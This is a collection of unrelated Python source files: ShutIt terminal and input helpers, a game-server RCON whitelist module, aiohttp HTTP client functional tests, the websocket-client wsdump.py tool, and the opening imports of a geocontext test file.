shutit_global.shutit_global_object.shutit_print(frame.f_locals)
print_frame_recurse(frame.f_back)
def check_regexp(regex):
if regex is None:
# Is this ok?
return True
try:
re.compile(regex)
return True
except re.error:
return False
def sendline(child, line):
"""Handles sending of line to pexpect object.
"""
child.sendline(line)
def sanitize_terminal():
os.system('stty sane')
def exit_cleanup():
time.sleep(1)
sys.stdout.write('ShutIt has exited, resetting terminal in 2...')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\rShutIt has exited, resetting terminal in 1...')
sys.stdout.flush()
time.sleep(1)
os.system('reset')
def util_raw_input(prompt='', default=None, ispass=False, use_readline=True):
"""Handles raw_input calls, and switches off interactivity if there is apparently
no controlling terminal (or there are any other problems)
"""
if use_readline:
try:
readline.read_init_file('/etc/inputrc')
except IOError:
pass
readline.parse_and_bind('tab: complete')
prompt = '\r\n' + prompt
if ispass:
prompt += '\r\nInput Secret: '
sanitize_terminal()
if shutit_global.shutit_global_object.interactive == 0:
return default
## See: https//github.com/ianmiell/shutit/issues/299 - python3 made input == python 2's raw_input
#if not shutit_global.shutit_global_object.ispy3:
# input = raw_input
#try:
# input
#except NameError:
# shutit_global.shutit_global_object.shutit_print('input not available, printing debug')
# print_debug()
# sys.exit(1)
if not shutit_global.shutit_global_object.determine_interactive():
return default
while True:
try:
if ispass:
return getpass.getpass(prompt=prompt)
else:
return input(prompt).strip() or default
except KeyboardInterrupt:
continue
except IOError:
msg = 'Problems getting raw input, assuming no controlling terminal.'
if ispass:
return getpass.getpass(prompt=prompt)
else:
return input(prompt).strip() or default
shutit_global.shutit_global_object.set_noninteractive(msg=msg)
return default
def get_input(msg, default='', valid=None, boolean=False, ispass=False, color=None):
"""Gets input from the user, and returns the answer.
@param msg: message to send to user
@param default: default value if nothing entered
@param valid: valid input values (default == empty list == anything allowed)
@param boolean: whether return value should be boolean
@param ispass: True if this is a password (ie whether to not echo input)
@param color: Color code to colorize with (eg 32 = green)
"""
# switch off log tracing when in get_input
log_trace_when_idle_original_value = shutit_global.shutit_global_object.log_trace_when_idle
shutit_global.shutit_global_object.log_trace_when_idle = False
if boolean and valid is None:
valid = ('yes','y','Y','1','true','no','n','N','0','false')
if color:
answer = util_raw_input(prompt=colorise(color,msg),ispass=ispass)
else:
answer = util_raw_input(msg,ispass=ispass)
if boolean and answer in ('', None) and default != '':
# Revert log trace value to original
shutit_global.shutit_global_object.log_trace_when_idle = log_trace_when_idle_original_value
return default
if valid is not None:
while answer not in valid:
shutit_global.shutit_global_object.shutit_print('Answer must be one of: ' + str(valid),transient=True)
if color:
answer = util_raw_input(prompt=colorise(color,msg),ispass=ispass)
else:
answer = util_raw_input(msg,ispass=ispass)
if boolean:
if answer.lower() in ('yes','y','1','true','t'):
# Revert log trace value to original
shutit_global.shutit_global_object.log_trace_when_idle = log_trace_when_idle_original_value
return True
elif answer.lower() in ('no','n','0','false','f'):
# Revert log trace value to original
shutit_global.shutit_global_object.log_trace_when_idle = log_trace_when_idle_original_value
return False
# Revert log trace value to original
shutit_global.shutit_global_object.log_trace_when_idle = log_trace_when_idle_original_value
return answer or default
def print_debug(exc_info=None, msg=''):
if msg:
shutit_global.shutit_global_object.shutit_print('Message: ' + msg)
environ_string = ''
for env in os.environ:
environ_string += 'export ' + env + '=' + str(os.environ[env]) + ';'
shutit_global.shutit_global_object.shutit_print('\n=============================== DEBUG INFO =========================================')
shutit_global.shutit_global_object.shutit_print('This file: ' + os.path.dirname(os.path.realpath(__file__)))
shutit_global.shutit_global_object.shutit_print('Python version: ' + 'sys.version_info: ' + str(sys.version_info) + ', sys.version: ' + str(sys.version))
shutit_global.shutit_global_object.shutit_print('Shutit version: ' + shutit.shutit_version)
shutit_global.shutit_global_object.shutit_print('Server: ' + socket.gethostname())
shutit_global.shutit_global_object.shutit_print('Environment: ' + environ_string)
shutit_global.shutit_global_object.shutit_print('Command was: ' + sys.executable + (' ').join(sys.argv))
shutit_global.shutit_global_object.shutit_print('ShutIt global state: ' + str(shutit_global.shutit_global_object))
if exc_info:
stack_trace = ''
for line in traceback.format_exception(*exc_info):
stack_trace += line
shutit_global.shutit_global_object.shutit_print('Stacktrace:\n' + stack_trace)
shutit_global.shutit_global_object.shutit_print('\n=============================== DEBUG INFO =========================================')
|
rconwhitelist.py
|
import sys, os, sched, logging, threading, time, json
import lib.rconprotocol
from lib.rconprotocol import Player
class RconWhitelist(object):
Interval = 30 # interval how often the whitelist.json should be saved (default: every 30 seconds)
def __init__(self, rcon, configFile, GUI=False):
self.configFile = configFile
self.rcon = rcon
self.whitelist = []
self.changed = False
self.modified = None
self.GUI = GUI
if not(os.path.isfile(self.configFile)):
open(self.configFile, 'a').close()
logging.info("[WHITELIST] Loading whitelist...")
self.loadConfig()
if self.GUI: return
# thread to save whitelist.json every X
self.saveConfigAsync()
# thread to watch for file changes
t = threading.Thread(target=self.watchConfig)
t.daemon = True
t.start()
"""
public: (Re)Load the commands configuration file
"""
def loadConfig(self):
with open(self.configFile) as json_config:
try:
config = json.load(json_config)
except ValueError:
config = []
self.whitelist = []
for x in config:
self.whitelist.append( Player.fromJSON(x) )
self.modified = os.path.getmtime(self.configFile)
def watchConfig(self):
if not(os.path.isfile(self.configFile)): return
time.sleep(10)
mtime = os.path.getmtime(self.configFile)
if self.modified != mtime:
self.loadConfig()
self.fetchPlayers()
self.watchConfig()
def saveConfigAsync(self):
t = threading.Thread(target=self.saveConfig)
t.daemon = True
t.start()
def saveConfig(self):
if self.changed or self.GUI:
with open(self.configFile, 'w') as outfile:
json.dump([ob.__dict__ for ob in self.whitelist], outfile, indent=4, sort_keys=True)
if self.GUI: return
self.changed = False
time.sleep(self.Interval)
self.saveConfig()
def fetchPlayers(self):
self.rcon.sendCommand('players')
def checkPlayer(self, player):
if player.allowed:
logging.info('[WHITELIST] Player %s with ID %s IS WHITELISTED' % (player.name, player.guid))
return
logging.info('[WHITELIST] Player %s IS NOT WHITELISTED - Kick in progress' % (player.name))
self.rcon.sendCommand('kick {}'.format(player.number))
def OnPlayers(self, playerList):
for x in playerList:
found = [a for a in self.whitelist if a.guid == x.guid]
if len(found) <= 0: break
self.checkPlayer(found[0])
def OnPlayerConnect(self, player):
found = [x for x in self.whitelist if x.guid == player.guid]
# add the connecting player into the whitelist
if len(found) <= 0:
self.whitelist.append(player)
self.changed = True
found.append( player )
self.checkPlayer(found[0])
|
test_client_functional_oldstyle.py
|
"""HTTP client functional tests."""
import asyncio
import binascii
import cgi
import contextlib
import email.parser
import gc
import http.server
import io
import json
import logging
import os
import os.path
import re
import ssl
import sys
import threading
import traceback
import unittest
import urllib.parse
from http.cookies import SimpleCookie
from unittest import mock
from multidict import MultiDict
import aiohttp
import aiohttp.http
from aiohttp import client, helpers, test_utils, web
from aiohttp.multipart import MultipartWriter
from aiohttp.test_utils import run_briefly, unused_port
@contextlib.contextmanager
def run_server(loop, *, listen_addr=('127.0.0.1', 0),
use_ssl=False, router=None):
properties = {}
transports = []
class HttpRequestHandler:
def __init__(self, addr):
host, port = addr
self.host = host
self.port = port
self.address = addr
self._url = '{}://{}:{}'.format(
'https' if use_ssl else 'http', host, port)
def __getitem__(self, key):
return properties[key]
def __setitem__(self, key, value):
properties[key] = value
def url(self, *suffix):
return urllib.parse.urljoin(
self._url, '/'.join(str(s) for s in suffix))
async def handler(request):
if properties.get('close', False):
return
for hdr, val in request.message.headers.items():
if (hdr.upper() == 'EXPECT') and (val == '100-continue'):
request.writer.write(b'HTTP/1.0 100 Continue\r\n\r\n')
break
rob = router(properties, request)
return (await rob.dispatch())
class TestHttpServer(web.RequestHandler):
def connection_made(self, transport):
transports.append(transport)
super().connection_made(transport)
if use_ssl:
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
keyfile = os.path.join(here, 'sample.key')
certfile = os.path.join(here, 'sample.crt')
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.load_cert_chain(certfile, keyfile)
else:
sslcontext = None
def run(loop, fut):
thread_loop = asyncio.new_event_loop()
asyncio.set_event_loop(thread_loop)
host, port = listen_addr
server_coroutine = thread_loop.create_server(
lambda: TestHttpServer(
web.Server(handler, loop=thread_loop), keepalive_timeout=0.5),
host, port, ssl=sslcontext)
server = thread_loop.run_until_complete(server_coroutine)
waiter = thread_loop.create_future()
loop.call_soon_threadsafe(
fut.set_result, (thread_loop, waiter,
server.sockets[0].getsockname()))
try:
thread_loop.run_until_complete(waiter)
finally:
# call pending connection_made if present
run_briefly(thread_loop)
# close opened transports
for tr in transports:
tr.close()
run_briefly(thread_loop) # call close callbacks
server.close()
thread_loop.stop()
thread_loop.close()
gc.collect()
fut = loop.create_future()
server_thread = threading.Thread(target=run, args=(loop, fut))
server_thread.start()
thread_loop, waiter, addr = loop.run_until_complete(fut)
try:
yield HttpRequestHandler(addr)
finally:
thread_loop.call_soon_threadsafe(waiter.set_result, None)
server_thread.join()
class Router:
_response_version = "1.1"
_responses = http.server.BaseHTTPRequestHandler.responses
def __init__(self, props, request):
# headers
self._headers = http.client.HTTPMessage()
for hdr, val in request.message.headers.items():
self._headers.add_header(hdr, val)
self._props = props
self._request = request
self._method = request.message.method
self._uri = request.message.path
self._version = request.message.version
self._compression = request.message.compression
self._body = request.content
url = urllib.parse.urlsplit(self._uri)
self._path = url.path
self._query = url.query
@staticmethod
def define(rmatch):
def wrapper(fn):
f_locals = sys._getframe(1).f_locals
mapping = f_locals.setdefault('_mapping', [])
mapping.append((re.compile(rmatch), fn.__name__))
return fn
return wrapper
async def dispatch(self): # pragma: no cover
for route, fn in self._mapping:
match = route.match(self._path)
if match is not None:
try:
return (await getattr(self, fn)(match))
except Exception:
out = io.StringIO()
traceback.print_exc(file=out)
return (await self._response(500, out.getvalue()))
return ()
return (await self._response(self._start_response(404)))
def _start_response(self, code):
return web.Response(status=code)
async def _response(self, response, body=None,
headers=None, chunked=False, write_body=None):
r_headers = {}
for key, val in self._headers.items():
key = '-'.join(p.capitalize() for p in key.split('-'))
r_headers[key] = val
encoding = self._headers.get('content-encoding', '').lower()
if 'gzip' in encoding: # pragma: no cover
cmod = 'gzip'
elif 'deflate' in encoding:
cmod = 'deflate'
else:
cmod = ''
resp = {
'method': self._method,
'version': '%s.%s' % self._version,
'path': self._uri,
'headers': r_headers,
'origin': self._request.transport.get_extra_info('addr', ' ')[0],
'query': self._query,
'form': {},
'compression': cmod,
'multipart-data': []
}
if body: # pragma: no cover
resp['content'] = body
else:
resp['content'] = (
await self._request.read()).decode('utf-8', 'ignore')
ct = self._headers.get('content-type', '').lower()
# application/x-www-form-urlencoded
if ct == 'application/x-www-form-urlencoded':
resp['form'] = urllib.parse.parse_qs(self._body.decode('latin1'))
# multipart/form-data
elif ct.startswith('multipart/form-data'): # pragma: no cover
out = io.BytesIO()
for key, val in self._headers.items():
out.write(bytes('{}: {}\r\n'.format(key, val), 'latin1'))
b = await self._request.read()
out.write(b'\r\n')
out.write(b)
out.write(b'\r\n')
out.seek(0)
message = email.parser.BytesParser().parse(out)
if message.is_multipart():
for msg in message.get_payload():
if msg.is_multipart():
logging.warning('multipart msg is not expected')
else:
key, params = cgi.parse_header(
msg.get('content-disposition', ''))
params['data'] = msg.get_payload()
params['content-type'] = msg.get_content_type()
cte = msg.get('content-transfer-encoding')
if cte is not None:
resp['content-transfer-encoding'] = cte
resp['multipart-data'].append(params)
body = json.dumps(resp, indent=4, sort_keys=True)
# default headers
hdrs = [('Connection', 'close'),
('Content-Type', 'application/json')]
if chunked:
hdrs.append(('Transfer-Encoding', 'chunked'))
else:
hdrs.append(('Content-Length', str(len(body))))
# extra headers
if headers:
hdrs.extend(headers.items())
# headers
for key, val in hdrs:
response.headers[key] = val
if chunked:
self._request.writer.enable_chunking()
await response.prepare(self._request)
# write payload
if write_body:
try:
write_body(response, body)
except Exception:
return
else:
response.write(body.encode('utf8'))
return response
class Functional(Router):
@Router.define('/method/([A-Za-z]+)$')
def method(self, match):
return self._response(self._start_response(200))
@Router.define('/keepalive$')
def keepalive(self, match):
transport = self._request.transport
transport._requests = getattr(transport, '_requests', 0) + 1
resp = self._start_response(200)
if 'close=' in self._query:
return self._response(
resp, 'requests={}'.format(transport._requests))
else:
return self._response(
resp, 'requests={}'.format(transport._requests),
headers={'CONNECTION': 'keep-alive'})
@Router.define('/cookies$')
def cookies(self, match):
cookies = SimpleCookie()
cookies['c1'] = 'cookie1'
cookies['c2'] = 'cookie2'
resp = self._start_response(200)
for cookie in cookies.output(header='').split('\n'):
resp.headers.extend({'Set-Cookie': cookie.strip()})
resp.headers.extend(
{'Set-Cookie':
'ISAWPLB{A7F52349-3531-4DA9-8776-F74BC6F4F1BB}='
'{925EC0B8-CB17-4BEB-8A35-1033813B0523}; HttpOnly; Path=/'})
return self._response(resp)
@Router.define('/cookies_partial$')
def cookies_partial(self, match):
cookies = SimpleCookie()
cookies['c1'] = 'other_cookie1'
resp = self._start_response(200)
for cookie in cookies.output(header='').split('\n'):
resp.add_header('Set-Cookie', cookie.strip())
return self._response(resp)
@Router.define('/broken$')
def broken(self, match):
resp = self._start_response(200)
def write_body(resp, body):
self._transport.close()
raise ValueError()
return self._response(
resp,
body=json.dumps({'t': (b'0' * 1024).decode('utf-8')}),
write_body=write_body)
class TestHttpClientFunctional(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(None)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
def test_POST_DATA_with_charset(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
form = aiohttp.FormData()
form.add_field('name', 'текст',
content_type='text/plain; charset=koi8-r')
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request('post', url, data=form))
content = self.loop.run_until_complete(r.json())
self.assertEqual(1, len(content['multipart-data']))
field = content['multipart-data'][0]
self.assertEqual('name', field['name'])
self.assertEqual('текст', field['data'])
self.assertEqual(r.status, 200)
r.close()
session.close()
def test_POST_DATA_with_charset_pub_request(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
form = aiohttp.FormData()
form.add_field('name', 'текст',
content_type='text/plain; charset=koi8-r')
r = self.loop.run_until_complete(
aiohttp.request('post', url, data=form, loop=self.loop))
content = self.loop.run_until_complete(r.json())
self.assertEqual(1, len(content['multipart-data']))
field = content['multipart-data'][0]
self.assertEqual('name', field['name'])
self.assertEqual('текст', field['data'])
self.assertEqual(r.status, 200)
r.close()
def test_POST_DATA_with_content_transfer_encoding(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
form = aiohttp.FormData()
form.add_field('name', b'123',
content_transfer_encoding='base64')
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request('post', url, data=form))
content = self.loop.run_until_complete(r.json())
self.assertEqual(1, len(content['multipart-data']))
field = content['multipart-data'][0]
self.assertEqual('name', field['name'])
self.assertEqual(b'123', binascii.a2b_base64(field['data']))
# self.assertEqual('base64', field['content-transfer-encoding'])
self.assertEqual(r.status, 200)
r.close()
session.close()
def test_POST_MULTIPART(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
with MultipartWriter('form-data') as writer:
writer.append('foo')
writer.append_json({'bar': 'баз'})
writer.append_form([('тест', '4'), ('сетс', '2')])
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request('post', url, data=writer))
content = self.loop.run_until_complete(r.json())
self.assertEqual(3, len(content['multipart-data']))
self.assertEqual({'content-type': 'text/plain', 'data': 'foo'},
content['multipart-data'][0])
self.assertEqual({'content-type': 'application/json',
'data': '{"bar": "\\u0431\\u0430\\u0437"}'},
content['multipart-data'][1])
self.assertEqual(
{'content-type': 'application/x-www-form-urlencoded',
'data': '%D1%82%D0%B5%D1%81%D1%82=4&'
'%D1%81%D0%B5%D1%82%D1%81=2'},
content['multipart-data'][2])
self.assertEqual(r.status, 200)
r.close()
session.close()
def test_POST_STREAM_DATA(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
here = os.path.dirname(__file__)
fname = os.path.join(here, 'sample.key')
with open(fname, 'rb') as f:
data = f.read()
fut = self.loop.create_future()
@aiohttp.streamer
async def stream(writer):
await fut
writer.write(data)
self.loop.call_later(0.01, fut.set_result, True)
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request(
'post', url, data=stream(),
headers={'Content-Length': str(len(data))}))
content = self.loop.run_until_complete(r.json())
r.close()
session.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
self.assertEqual('application/octet-stream',
content['headers']['Content-Type'])
def test_POST_StreamReader(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
here = os.path.dirname(__file__)
fname = os.path.join(here, 'sample.key')
with open(fname, 'rb') as f:
data = f.read()
stream = aiohttp.StreamReader(loop=self.loop)
stream.feed_data(data)
stream.feed_eof()
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request(
'post', url, data=stream,
headers={'Content-Length': str(len(data))}))
content = self.loop.run_until_complete(r.json())
r.close()
session.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
def test_POST_DataQueue(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
here = os.path.dirname(__file__)
fname = os.path.join(here, 'sample.key')
with open(fname, 'rb') as f:
data = f.read()
stream = aiohttp.DataQueue(loop=self.loop)
stream.feed_data(data[:100], 100)
stream.feed_data(data[100:], len(data[100:]))
stream.feed_eof()
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request(
'post', url, data=stream,
headers={'Content-Length': str(len(data))}))
content = self.loop.run_until_complete(r.json())
r.close()
session.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
def test_POST_ChunksQueue(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
here = os.path.dirname(__file__)
fname = os.path.join(here, 'sample.key')
with open(fname, 'rb') as f:
data = f.read()
stream = aiohttp.ChunksQueue(loop=self.loop)
stream.feed_data(data[:100], 100)
d = data[100:]
stream.feed_data(d, len(d))
stream.feed_eof()
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request(
'post', url, data=stream,
headers={'Content-Length': str(len(data))}))
content = self.loop.run_until_complete(r.json())
r.close()
session.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
def test_request_conn_closed(self):
with run_server(self.loop, router=Functional) as httpd:
httpd['close'] = True
session = client.ClientSession(loop=self.loop)
with self.assertRaises(aiohttp.ServerDisconnectedError):
self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get')))
session.close()
def test_session_close(self):
conn = aiohttp.TCPConnector(loop=self.loop)
session = client.ClientSession(loop=self.loop, connector=conn)
with run_server(self.loop, router=Functional) as httpd:
r = self.loop.run_until_complete(
session.request(
'get', httpd.url('keepalive') + '?close=1'))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertEqual(content['content'], 'requests=1')
r.close()
r = self.loop.run_until_complete(
session.request('get', httpd.url('keepalive')))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertEqual(content['content'], 'requests=1')
r.close()
session.close()
conn.close()
def test_multidict_headers(self):
session = client.ClientSession(loop=self.loop)
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
data = b'sample data'
r = self.loop.run_until_complete(
session.request(
'post', url, data=data,
headers=MultiDict(
{'Content-Length': str(len(data))})))
content = self.loop.run_until_complete(r.json())
r.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
session.close()
def test_dont_close_explicit_connector(self):
async def go(url):
connector = aiohttp.TCPConnector(loop=self.loop)
session = client.ClientSession(loop=self.loop, connector=connector)
r = await session.request('GET', url)
await r.read()
self.assertEqual(1, len(connector._conns))
connector.close()
session.close()
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('keepalive')
self.loop.run_until_complete(go(url))
def test_server_close_keepalive_connection(self):
class Proto(asyncio.Protocol):
def connection_made(self, transport):
self.transp = transport
self.data = b''
def data_received(self, data):
self.data += data
if data.endswith(b'\r\n\r\n'):
self.transp.write(
b'HTTP/1.1 200 OK\r\n'
b'CONTENT-LENGTH: 2\r\n'
b'CONNECTION: close\r\n'
b'\r\n'
b'ok')
self.transp.close()
def connection_lost(self, exc):
self.transp = None
async def go():
server = await self.loop.create_server(
Proto, '127.0.0.1', unused_port())
addr = server.sockets[0].getsockname()
connector = aiohttp.TCPConnector(loop=self.loop, limit=1)
session = client.ClientSession(loop=self.loop, connector=connector)
url = 'http://{}:{}/'.format(*addr)
for i in range(2):
r = await session.request('GET', url)
await r.read()
self.assertEqual(0, len(connector._conns))
session.close()
connector.close()
server.close()
await server.wait_closed()
self.loop.run_until_complete(go())
def test_handle_keepalive_on_closed_connection(self):
class Proto(asyncio.Protocol):
def connection_made(self, transport):
self.transp = transport
self.data = b''
def data_received(self, data):
self.data += data
if data.endswith(b'\r\n\r\n'):
self.transp.write(
b'HTTP/1.1 200 OK\r\n'
b'CONTENT-LENGTH: 2\r\n'
b'\r\n'
b'ok')
self.transp.close()
def connection_lost(self, exc):
self.transp = None
async def go():
server = await self.loop.create_server(
Proto, '127.0.0.1', unused_port())
addr = server.sockets[0].getsockname()
connector = aiohttp.TCPConnector(loop=self.loop, limit=1)
session = client.ClientSession(loop=self.loop, connector=connector)
url = 'http://{}:{}/'.format(*addr)
r = await session.request('GET', url)
await r.read()
self.assertEqual(1, len(connector._conns))
with self.assertRaises(aiohttp.ServerDisconnectedError):
await session.request('GET', url)
self.assertEqual(0, len(connector._conns))
session.close()
connector.close()
server.close()
await server.wait_closed()
self.loop.run_until_complete(go())
@mock.patch('aiohttp.client_reqrep.client_logger')
def test_session_cookies(self, m_log):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(loop=self.loop)
resp = self.loop.run_until_complete(
session.request('get', httpd.url('cookies')))
self.assertEqual(resp.cookies['c1'].value, 'cookie1')
self.assertEqual(resp.cookies['c2'].value, 'cookie2')
resp.close()
# Add the received cookies as shared for sending them to the test
# server, which is only accessible via IP
session.cookie_jar.update_cookies(resp.cookies)
# Assert, that we send those cookies in next requests
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get')))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertEqual(
content['headers']['Cookie'], 'c1=cookie1; c2=cookie2')
r.close()
session.close()
def test_session_headers(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, headers={
"X-Real-IP": "192.168.0.1"
})
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get')))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertIn(
"X-Real-Ip", content['headers'])
self.assertEqual(
content['headers']["X-Real-Ip"], "192.168.0.1")
r.close()
session.close()
def test_session_headers_merge(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, headers=[
("X-Real-IP", "192.168.0.1"),
("X-Sent-By", "requests")])
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get'),
headers={"X-Sent-By": "aiohttp"}))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertIn(
"X-Real-Ip", content['headers'])
self.assertIn(
"X-Sent-By", content['headers'])
self.assertEqual(
content['headers']["X-Real-Ip"], "192.168.0.1")
self.assertEqual(
content['headers']["X-Sent-By"], "aiohttp")
r.close()
session.close()
def test_session_auth(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, auth=helpers.BasicAuth("login", "pass"))
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get')))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertIn(
"Authorization", content['headers'])
self.assertEqual(
content['headers']["Authorization"], "Basic bG9naW46cGFzcw==")
r.close()
session.close()
def test_session_auth_override(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, auth=helpers.BasicAuth("login", "pass"))
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get'),
auth=helpers.BasicAuth("other_login", "pass")))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertIn(
"Authorization", content['headers'])
self.assertEqual(
content['headers']["Authorization"],
"Basic b3RoZXJfbG9naW46cGFzcw==")
r.close()
session.close()
def test_session_auth_header_conflict(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, auth=helpers.BasicAuth("login", "pass"))
headers = {'Authorization': "Basic b3RoZXJfbG9naW46cGFzcw=="}
with self.assertRaises(ValueError):
self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get'),
headers=headers))
session.close()
|
wsdump.py
|
#!/Users/marius/Documents/EFREI/S7/Robotique/TP2/pyApp/venv/bin/python3
"""
wsdump.py
websocket - WebSocket client library for Python
Copyright 2021 engn33r
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
from urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
line = input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, str):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, str):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
test_geocontext.py
|
import pytest
import unittest
import mock
import multiprocessing
import concurrent.futures
